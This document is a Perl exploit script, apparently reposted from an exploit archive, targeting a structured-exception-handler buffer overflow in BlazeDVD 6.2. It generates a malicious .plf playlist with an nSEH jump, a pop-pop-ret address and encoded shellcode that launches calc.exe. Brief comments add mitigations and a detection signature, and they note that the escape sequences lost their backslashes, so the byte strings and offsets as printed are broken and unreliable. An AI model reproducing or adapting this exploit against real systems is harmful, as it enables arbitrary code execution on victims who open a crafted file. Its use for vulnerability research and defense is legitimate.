BlazeDVD 6.2 Buffer Overflow
Posted on 30 October 2013
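#!/usr/bin/perl
#########################################################################################
# Exploit Title: BlazeDVD 6.2 .plf Buffer Overflow (SEH)
# Date: 10-28-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: BlazeDVD 6.2
# Software Link: http://www.videocharge.com/download/WatermarkMaster_Install.exe
# Version: 6.2.0.0
# Tested On: Windows XP SP3
# To exploit, simply open blazesploit.plf file
#########################################################################################
#
# Structure of the generated .plf file (per the author's offsets below):
#   [868 bytes filler][nSEH: 4 bytes][SEH: 4 bytes][20-byte pad][payload][filler to 10000]
# The SEH handler address is taken from a module the author reports as having
# neither SafeSEH nor ASLR, which is what makes a fixed address usable here.
# Defensive takeaways: building the module with /SAFESEH and /DYNAMICBASE (and
# running with DEP) removes that property; a playlist file of ~10000 bytes made
# almost entirely of repeated single-byte filler around an alphanumeric-encoded
# blob is a simple content-based detection signature for this sample.
#
# NOTE(review): the escape sequences in this listing appear to have lost their
# leading backslashes during extraction ("x41" is three literal characters as
# shown), so the stated byte offsets do not hold for the text as printed. The
# strings below are kept exactly as they appear on the page.

use strict;
use warnings;

my $buffsize = 10000;        # sets buffer size for consistent sized payload
my $junk     = "x41" x 868;  # nseh is at offset 868, followed by 2864 bytes of available data
my $nseh     = "xebx08x90x90";      # overwrite next seh with jmp instruction (8 bytes)
my $seh      = pack('V', 0x6033aa41); # overwrite seh w/ pop ecx pop ecx ret
# ASLR: False, Rebase: False, SafeSEH: False, OS: False
# Program Files\BlazeVideo\BlazeDVD 6.1\Configuration.dll  (path separators reconstructed)
my $nops     = "x90" x 20;   # pad shellcode

# Calc.exe payload [size 461] -- Mind the encoding!
# msfpayload windows/exec CMD=calc.exe R |
# msfencode -e x86/alpha_mixed -c 1 -b 'x00x0ax0dxff'
my $shell =
    "xdbxcdxd9x74x24xf4x5fx57x59x49x49x49x49x49" .
    "x49x49x49x49x43x43x43x43x43x43x43x37x51x5a" .
    "x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" .
    "x42x32x42x42x30x42x42x41x42x58x50x38x41x42" .
    "x75x4ax49x69x6cx6bx58x4fx79x55x50x75x50x35" .
    "x50x33x50x4bx39x49x75x66x51x4ax72x52x44x6e" .
    "x6bx70x52x44x70x6ex6bx42x72x44x4cx4cx4bx63" .
    "x62x64x54x6ex6bx42x52x54x68x34x4fx6cx77x63" .
    "x7ax35x76x65x61x4bx4fx74x71x4fx30x6cx6cx65" .
    "x6cx71x71x53x4cx46x62x76x4cx37x50x49x51x68" .
    "x4fx76x6dx57x71x6bx77x7ax42x7ax50x32x72x42" .
    "x77x4cx4bx42x72x44x50x6cx4bx31x52x37x4cx55" .
    "x51x7ax70x4cx4bx33x70x62x58x4fx75x6bx70x51" .
    "x64x52x6ax77x71x78x50x42x70x4cx4bx52x68x47" .
    "x68x4cx4bx46x38x37x50x77x71x5ax73x58x63x55" .
    "x6cx53x79x4ex6bx66x54x4cx4bx73x31x38x56x75" .
    "x61x59x6fx36x51x59x50x4cx6cx6ax61x4ax6fx34" .
    "x4dx46x61x79x57x77x48x49x70x31x65x4bx44x65" .
    "x53x43x4dx6bx48x65x6bx53x4dx64x64x53x45x6d" .
    "x32x73x68x6ex6bx70x58x67x54x67x71x39x43x62" .
    "x46x6cx4bx76x6cx42x6bx4ex6bx62x78x45x4cx37" .
    "x71x38x53x4cx4bx46x64x4cx4bx45x51x48x50x4c" .
    "x49x50x44x71x34x47x54x71x4bx31x4bx63x51x31" .
    "x49x63x6ax70x51x69x6fx39x70x46x38x73x6fx53" .
    "x6ax4ex6bx56x72x58x6bx4bx36x31x4dx42x4ax55" .
    "x51x4cx4dx4dx55x38x39x65x50x65x50x65x50x56" .
    "x30x62x48x75x61x4cx4bx62x4fx4fx77x79x6fx49" .
    "x45x6fx4bx5ax50x6cx75x4dx72x36x36x42x48x59" .
    "x36x4ax35x4dx6dx6dx4dx49x6fx49x45x45x6cx45" .
    "x56x43x4cx76x6ax4fx70x39x6bx4bx50x42x55x36" .
    "x65x4dx6bx51x57x44x53x62x52x50x6fx62x4ax77" .
    "x70x56x33x6bx4fx4ax75x35x33x35x31x72x4cx33" .
    "x53x74x6ex32x45x43x48x75x35x37x70x41x41";

my $sploit = $junk . $nseh . $seh . $nops . $shell;   # assemble the sploit

# A negative repeat count silently yields an empty string, which would hide an
# oversized assembly; fail loudly instead so the output length stays predictable.
die "assembled data (" . length($sploit) . " bytes) exceeds buffer size $buffsize\n"
    if length($sploit) > $buffsize;

my $fill   = "x43" x ($buffsize - length($sploit));  # create buffer fill
my $buffer = $sploit . $fill;                          # assemble final buffer

# write the exploit buffer to file
# Three-argument open with a lexical handle, ':raw' because the content is
# bytes rather than text, and every I/O step checked (write errors on a
# buffered handle only surface at close).
my $file = "blazesploit.plf";
open my $out, '>:raw', $file or die "open $file: $!";
print {$out} $buffer or die "write $file: $!";
close $out or die "close $file: $!";

print "Exploit file created [" . $file . "] ";
print "Buffer size: " . length($buffer) . " ";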
